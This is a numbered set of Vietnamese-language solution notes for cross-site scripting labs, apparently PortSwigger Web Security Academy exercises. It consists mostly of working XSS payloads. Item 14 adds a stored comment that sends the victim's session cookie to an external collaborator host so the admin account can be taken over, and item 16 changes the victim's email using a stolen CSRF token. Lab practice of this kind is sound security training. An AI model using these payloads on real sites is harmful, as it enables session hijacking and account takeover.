1: Nhập vào ô search nội dung <script>window.alert('hello')</script> rồi bấm search

2: Nhập nội dung ở câu 1 vào comment và post comment

3: (XEM SOLUTION) "><svg onload=alert(1)>

4: ""><img src=1 onerror=alert(document.domain)>

5: https://0a4200bc03dad49cc01f313f00c3004e.web-security-academy.net/feedback?returnPath=javascript:alert(document.domain) 

thêm vào sau returnPath để hiện thông báo về domain

6: <iframe src="https://0a6b0048038c450dc0a4a4d2004d0023.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
Cho phần trên vào body của exploit server và chọn 'Deliver exploit to victim'

7: " autofocus onfocus=alert(document.domain) a="

8: Vào post và tạo comment với nội dung, tên và email ngẫu nhiên còn website là : javascript:alert(1) 

9: '; alert() // 

10: https://0ac100290471b7c9c08c18b7003b0000.web-security-academy.net/product?productId=1&storeId=%3C/option%3E%3C/select%3E%3Cimg%20src=1%20onerror+=+alert()%3E

11: (XEM SOLUTION) {{$on.constructor('alert()')()}} điền vào searchbox

12: \"-alert(1)}// điền vào searchbox

13: để nội dụng comment thành <><img+src=1+onerror=alert(document.domain)>

14: Thử và thấy có thể inject được phần comment của web, ta thêm vào nội dung comment như sau:
</p><script>fetch('https://onfpoqbji8qlb1r6z86jwk4tkkqbe32s.oastify.com',{method:'POST',mode:'no-cors',body:document.cookie});</script>
đoạn script này sẽ được chạy và gửi đến burpsuite collab kèm theo cookie của victim. Sau khi post comment chờ một lúc ở collab sẽ có HTTP req, lấy session cookie đó và thay vào cookie của req GET / ta sẽ chuyển sang acc admin

15: XEM SOLUTION

16: đưa vào nội dung phần comment

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('email=a@a'+'&csrf='+token)
};
</script>

17: XEM SOLUTION

18: điền vào payload của exploit sever:

%3Cxss+id%3Dsolved+onfocus%3Dalert%28document.cookie%29%3E#solved';

bấm store và delivery to victim

19: ?search=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert()%3E

20: ?%27accesskey=%27x%27onclick=%27alert()

21: </script><script>alert()</script>

22: \';alert();//

23: https://0a0a0050034d3b19c0d01d2d001a0001.web-security-academy.net%26apos;-alert(document.domain)-%26apos;

24: ${alert(document.domain)}

25: <svg><a><animate attributeName=href values=javascript:alert() /></a>

26: (XEM SOLUTION) post?postId=1&%27},x=x=>{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27

27: /?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

28: 